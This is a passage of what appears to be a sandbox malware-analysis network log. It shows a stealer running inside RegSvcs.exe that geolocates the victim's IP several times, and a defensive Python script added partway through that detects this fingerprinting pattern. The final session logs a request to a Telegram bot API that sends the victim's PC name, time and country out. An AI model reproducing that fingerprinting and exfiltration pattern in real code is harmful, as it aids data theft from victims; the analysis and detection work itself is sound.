2025-01-10 17:46:36 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49734 | 104.21.64.14 | 443 | 3328 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 17:46:37 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-10 17:46:38 UTC | 861 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 17:46:37 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1845987
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rcZp%2Fi6sg8uWGZGmINd1jAomkR5xRnQ%2BzjWYpt94vKepejq%2F2oZwBrSyENBFR8mnh%2Bfxknms6UR40UA%2BMsTuSkyM5Whbz0rjo%2Bfwj8UUy35CLPrCe2DUsLZo89C1ID4I4nPXxWAm"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffe7cd35fd5de95-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1607&rtt_var=606&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1801357&cwnd=243&unsent_bytes=0&cid=09f090f0e20c470e&ts=152&x=0"
2025-01-10 17:46:38 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo
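The sessions above show the sample learning its public address from checkip.dyndns.org (seven near-identical GET / requests from RegSvcs.exe within about ten seconds) and then asking reallyfreegeoip.org to geolocate that exact address, which is the behaviour the "Tries to detect the country of the analysis system (by using the IP)" signature refers to. The Python below is an added example for this report, not Joe Sandbox tooling and not code from the sample: it parses request/response pairs like the ones logged here, extracts the public IP from the IP-check reply, checks that the GeoIP lookup path carries that same IP, pulls CountryCode out of the XML (falling back to a regex when the body is cut off mid-element, as it is in this capture), and flags the legacy MSIE 6.0 User-Agent and RegSvcs.exe acting as an HTTP client. The session records are constructed to mirror the report (sessions 9, 10 and 0 copy its data; session 1 is the same reply with the XML closed so the parser path is exercised), and the host and process sets contain only what this page shows; both are meant to be extended from your own telemetry.

```python
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from typing import Optional

# Lookup services and the unexpected HTTP client seen in the report above; extend from your own telemetry.
IP_CHECK_HOSTS = {"checkip.dyndns.org"}
GEOIP_HOSTS = {"reallyfreegeoip.org"}
UNEXPECTED_HTTP_CLIENTS = {"RegSvcs.exe"}  # .NET utility with no reason to browse on its own
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

@dataclass
class HttpSession:
    session_id: int
    process: str  # image path as the sandbox records it
    path: str = ""
    headers: dict = field(default_factory=dict)  # request headers, keys lower-cased
    status: Optional[int] = None
    body: str = ""

    @property
    def host(self) -> str:
        return self.headers.get("host", "").lower()

def _split_head_body(raw: str):  # CRLF on the wire, LF when copied out of a report
    head, _, body = raw.partition("\r\n\r\n" if "\r\n\r\n" in raw else "\n\n")
    return head, body

def parse_exchange(session_id, process, raw_request, raw_response) -> HttpSession:
    """Build an HttpSession from one raw request and its raw response."""
    s = HttpSession(session_id, process)
    lines = _split_head_body(raw_request)[0].splitlines()
    parts = lines[0].split() if lines else []
    s.path = parts[1] if len(parts) > 1 else ""
    for line in lines[1:]:
        if ":" in line:
            k, v = line.split(":", 1)
            s.headers[k.strip().lower()] = v.strip()
    resp_head, s.body = _split_head_body(raw_response)
    m = re.match(r"HTTP/\d\.\d (\d{3})", resp_head)
    s.status = int(m.group(1)) if m else None
    return s

def extract_public_ip(s: HttpSession) -> Optional[str]:
    """Public IP the victim learned from an IP-check service, if this session is one."""
    if s.host not in IP_CHECK_HOSTS or s.status != 200:
        return None
    m = IPV4_RE.search(s.body)
    return m.group(0) if m else None

def extract_country(s: HttpSession) -> Optional[str]:
    """CountryCode from a GeoIP XML reply, with a regex fallback for bodies the capture cut short."""
    if s.host not in GEOIP_HOSTS:
        return None
    try:
        node = ET.fromstring(s.body.strip()).find("CountryCode")
        if node is not None and node.text:
            return node.text.strip()
    except ET.ParseError:
        pass  # the report shows the XML truncated mid-element; fall through to the regex
    m = re.search(r"<CountryCode>([A-Z]{2})</CountryCode>", s.body)
    return m.group(1) if m else None

def analyze(sessions) -> dict:
    """Correlate IP-check and GeoIP sessions and summarise what the client learned."""
    public_ips = list(dict.fromkeys(ip for ip in map(extract_public_ip, sessions) if ip))
    countries = list(dict.fromkeys(cc for cc in map(extract_country, sessions) if cc))
    geo = [s for s in sessions if s.host in GEOIP_HOSTS]
    # A lookup is correlated when its path carries an IP learned moments earlier from the IP-check host.
    correlated = any(ip in s.path for s in geo for ip in public_ips)
    clients = {s.process.replace("/", "\\").rsplit("\\", 1)[-1] for s in sessions}
    return {
        "public_ips": public_ips,
        "ip_check_count": sum(1 for s in sessions if s.host in IP_CHECK_HOSTS),
        "geo_lookup_count": len(geo),
        "geo_lookup_correlated": correlated,
        "country_codes": countries,
        "legacy_user_agent": any("MSIE 6.0" in s.headers.get("user-agent", "") for s in sessions),
        "unexpected_http_clients": sorted(clients & UNEXPECTED_HTTP_CLIENTS),
        "verdict": "victim-fingerprinting" if correlated else "no-pattern",
    }

def build_sample_sessions():
    """Constructed sessions mirroring the report: 9, 10 and 0 copy its data, 1 completes the cut-off XML."""
    ua = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
    regsvcs = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    ipcheck_req = f"GET / HTTP/1.1\r\nUser-Agent: {ua}\r\nHost: checkip.dyndns.org\r\nConnection: Keep-Alive\r\n\r\n"
    ipcheck_resp = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 104\r\n\r\n"
                    "<html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>\r\n")
    geo_req = "GET /xml/8.46.123.189 HTTP/1.1\r\nHost: reallyfreegeoip.org\r\nConnection: Keep-Alive\r\n\r\n"
    geo_head = "HTTP/1.1 200 OK\r\nContent-Type: text/xml\r\n\r\n"
    geo_truncated = geo_head + "<Response>\n\t<IP>8.46.123.189</IP>\n\t<CountryCode>US</CountryCode>\n\t<TimeZo"
    geo_complete = geo_head + "<Response>\n\t<IP>8.46.123.189</IP>\n\t<CountryCode>US</CountryCode>\n</Response>\n"
    return [
        parse_exchange(9, regsvcs, ipcheck_req, ipcheck_resp),
        parse_exchange(10, regsvcs, ipcheck_req, ipcheck_resp),
        parse_exchange(0, regsvcs, geo_req, geo_truncated),
        parse_exchange(1, regsvcs, geo_req, geo_complete),
    ]
```

Run `analyze(build_sample_sessions())` to get the findings dict; on the constructed sessions it reports two IP checks, two GeoIP lookups for the same address, country code US, the legacy User-Agent and RegSvcs.exe as the client, and the verdict "victim-fingerprinting". Feeding it the other sessions from this page changes only the counts. The correlation step matters more than either host on its own: an IP check alone is common in legitimate software, while an IP check immediately followed by a GeoIP lookup of that same address from a process that should never speak HTTP is the stealer pattern worth alerting on.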


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49736 | 104.21.64.144 | 443 | 3328 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 17:46:39 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 17:46:39 UTC | 864 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:39 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1845988
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PYjHb1LpuSeOYzA6fDvvrDWl%2Bp20I6t9T9tWDfgMWO9NrIl0n3QPAX14C9JzSpsQhOSVbj0%2Fo5JGx1qmMb4q4K%2BjEriK3nZwXJ0Q70i%2FYVGZ9Xa0caHa2zSKsD3ttIg%2Fhe1j%2Fq%2Bi"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffe7cdbaee2c358-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2280&min_rtt=1751&rtt_var=1034&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1667618&cwnd=155&unsent_bytes=0&cid=d664ea9dc07997be&ts=156&x=0"
2025-01-10 17:46:39 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49738 | 104.21.64.144 | 443 | 3328 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 17:46:40 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-10 17:46:40 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:40 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1845989
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kGvxZyGup5wszibbIJ8rXnc3VNHa0JdZ1SNEUG6YXs3Lcj9Nu0T28w8JxJp%2BPMop%2Fc5CmazfL2E9ti7qoi7Ne3fJUWri9JA1BtOGAZtsWY%2F1EsuRm3JRgTg%2FLq6R8toF5ZZxn%2BwY"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffe7ce3cccd7c6a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2082&min_rtt=2047&rtt_var=792&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1426477&cwnd=218&unsent_bytes=0&cid=b3303c2c95b03940&ts=167&x=0"
2025-01-10 17:46:40 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49740 | 104.21.64.144 | 443 | 3328 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 17:46:41 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 17:46:41 UTC | 857 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:41 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1845991
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BOrU2Y4TAKSyHvz5N91mkyJg9yunStCfT3iLh8A5AZSG8kVpk%2Fuop8WYgUEyjcZHwMlbV9NEQE5w6h0Dku4rauSp%2FkYEw0OiE%2F13%2Bn8SWJFuGoNGG9EA4yFrlwbo7RIoS88dbyYe"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffe7cebeb2e8ca1-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2046&min_rtt=2011&rtt_var=825&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1272885&cwnd=168&unsent_bytes=0&cid=8555f841dd48f10a&ts=176&x=0"
2025-01-10 17:46:41 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49742 | 104.21.64.144 | 443 | 3328 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 17:46:43 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 17:46:43 UTC | 851 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:43 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1845992
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bF21dJjdpxTLId7taQlD7nK5N3pz8%2FZnvaRQEkKofEqaPVYKszgC2aEdg7t2WBlmPv0niPe3ZKRfrgfTxKlhV6rPXnHvBrC6U6etITa61GuWrGwn23k6Sau51Gfs2YdnHiNg2Qs5"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffe7cf46d1f8ca1-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2103&min_rtt=2103&rtt_var=1051&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4234&recv_bytes=699&delivery_rate=113266&cwnd=168&unsent_bytes=0&cid=d316d43a117c8a86&ts=187&x=0"
2025-01-10 17:46:43 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49745 | 104.21.64.144 | 443 | 3328 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 17:46:44 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 17:46:44 UTC | 867 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:44 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1845993
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0WZ4vYg18pna2Me0WeE%2F%2FPT%2FehZ9Y8SieB%2FqJsdddIpyTuj%2BTcEdqtM%2FhSeXnMEce4IZK%2FwLH3bVswQ3w1m0ze4L7Jf480wtvUdrnVFciQR4%2FNNstNLz%2B5aF7yUvIm0ZGYhToiZM"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffe7cfce815de95-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1644&rtt_var=653&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1631284&cwnd=243&unsent_bytes=0&cid=ab81282d736ba1ea&ts=149&x=0"
2025-01-10 17:46:44 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49749 | 104.21.64.144 | 443 | 3328 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 17:46:45 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 17:46:45 UTC | 855 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:45 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1845995
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CzgyKVED%2Fl6HnsUKg7A64otMlm0gDrb8X8%2BeXn4qk73X1EPFFzJVK06CfCqsOupztsD9qFZe0HPMch5cyOw0ZxMCdTobhZIedmkTv7iFYgndkbj9dc4NKAMCS7qLqGWE%2F8nkEJIt"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffe7d04fda37c6a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1969&rtt_var=796&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1326669&cwnd=218&unsent_bytes=0&cid=fac4f172ee08b4c0&ts=151&x=0"
2025-01-10 17:46:45 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49751 | 149.154.167.220 | 443 | 3328 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 17:46:46 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2011/01/2025%20/%2000:31:36%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2025-01-10 17:46:47 UTC | 344 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 17:46:46 GMT
Content-Type: application/json
Content-Length: 55
